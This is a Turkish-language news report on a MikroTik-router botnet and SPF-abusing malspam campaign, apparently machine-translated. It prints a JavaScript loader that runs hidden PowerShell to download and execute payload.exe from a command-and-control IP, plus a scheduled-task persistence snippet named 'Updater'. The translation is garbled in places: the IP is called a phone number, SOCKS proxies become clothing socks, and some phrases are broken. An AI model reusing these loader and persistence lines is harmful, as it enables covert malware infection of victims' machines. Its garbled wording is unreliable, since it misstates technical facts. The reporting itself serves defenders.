Küresel bir Malspam operasyonunu ilerletmek için DNS yanlış yapılandırma ve kaçırılmış ağ cihazlarının yeni bir kombinasyonunu kullanarak Kasım ayı sonlarında daha önce görülmemiş bir Botnet kampanyası ortaya çıktı.
İlk raporlar, düzinelerce kuruluş, her biri kötü amaçlı bir JavaScript yükü olan bir fermuar arşivi içeren meşru yük faturaları gibi görünen şeyleri aldığında ortaya çıktı.
Yürütme üzerine komut dosyası, Rus tehdit aktörleriyle daha önce bağları olan 62.133.60.137 numaralı telefondan bir uzak komut ve kontrol sunucusuna bağlanmak için bir PowerShell rutini başlattı.
Infoblox analistleri, temel altyapının açık çoraplara dönüşen 13.000’den fazla uzlaşmış mikrotik yönlendiriciye dayandığını tespit etti4 vekilleri 4.
Bu geniş röle ağı sadece e-posta dağıtım hacmini yükseltmekle kalmaz, aynı zamanda saldırıların gerçek kökenini de gizleyerek geleneksel IP tabanlı filtrelemeyi etkisiz hale getirir.
Kampanya, tek bir güvenlik açığından yararlanmak yerine, birçok Mikrotik cihazla gönderilen varsayılan veya kötü güvenli yapılandırmalardan yararlanır.
SPAM e -postaları, yanlış yapılandırılmış SPF kayıtlarını kötüye kullanarak yüzlerce meşru alan adını aldı.
Etki alanı sahipleri, yanlışlıkla – veya kötü niyetli değişiklik yoluyla – TXT kayıtlarını “All” yönergesiyle ilişkilendirmiş ve herhangi bir posta sunucusunun adına mesaj göndermesine etkin bir şekilde izin vermişlerdir.
Sonuç, DKIM, SPF ve DMARC kontrollerinin yaygın bir baypasıydı ve kötü niyetli e -postaların posta filtrelerini kurumsal gelen kutulara kaydırmasını sağladı.
Bu botnet, ağ katmanındaki cihaz uzlaşmasını DNS seviyesi manipülasyonuyla birleştirerek büyük ölçekli spam işlemlerinde malzeme bir kaymayı temsil eder.
Ekli Zip arşivlerini açan kurbanlar, enfeksiyon oranlarını en üst düzeye çıkarmak ve algılamadan kaçmak için çoklu taktiklerin sorunsuz entegrasyonunu gösteren yükleyici komut dosyasını dağıtan gizlenmiş bir JavaScript dosyasını tetikledi.
Enfeksiyon mekanizması
Kötü amaçlı yazılımın enfeksiyon zinciri, bir zip arşivinin içinde gizli bir JavaScript dosyası ile başlar.
.webp)
Çalıştırıldığında, komut dosyası daha fazla yük getirmek için C2 sunucusuna ulaşan bir PowerShell yükleyici yazar ve yürütür.
Aşağıdaki JavaScript kodu snippet, PowerShell komutunun nasıl oluşturulduğunu ve yürütüldüğünü gösterir:-
var cmd = 'powershell -NoProfile -WindowStyle Hidden -Command ' +
'"$wc = New-Object System.Net.WebClient; ' +
'$wc.DownloadFile(\'http://62.133.60.137/payload.exe\', \'C:\\Users\\Public\\payload.exe\'); ' +
'Start-Process \'C:\\Users\\Public\\payload.exe\'"';
WScript.Shell.Run(cmd, 0, true);Yükleyici etkin olduğunda, PowerShell komut dosyası sorgulayarak yürütme bağlamını doğrular Get-ExecutionPolicy.
Politika komut dosyası çalışmasını kısıtlarsa, kötü amaçlı yazılım geçici olarak kısıtlamaları kullanır Set-ExecutionPolicy Bypass -Scope Process.
Ardından, kullanıcı oturumunda çalışan “güncelleyici” adlı planlanmış bir görev oluşturarak kalıcılık oluşturur:-
$action = New-ScheduledTaskAction -Execute 'powershell.exe' -Argument '-NoProfile -WindowStyle Hidden -File C:\Users\Public\payload.exe'
$trigger = New-ScheduledTaskTrigger -AtLogOn
Register-ScheduledTask -Action $action -Trigger $trigger -TaskName 'Updater' -Description 'System Updater'Bu mekanizma, ağ trafiği BOTNET’in SOCKS4 vekilleri boyunca yönlendirilirken, yükün yeniden başlatmalarda aktif kalmasını sağlar.
Meşru ağ hizmetlerine ve yasal DNS kayıtlarına olan güven, iyi huylu ve kötü niyetli etkinlik arasındaki çizgiyi bulanıklaştırır, bu da savunuculara önemli bir zorluk oluşturur ve titiz DNS konfigürasyon denetimlerine ve yönlendirici güvenlik sertleşmesine acil ihtiyacın altını çizer.
Bu hikayeyi ilginç bul! Daha fazla anında güncellemeler almak için bizi Google News, LinkedIn ve X’te takip edin.
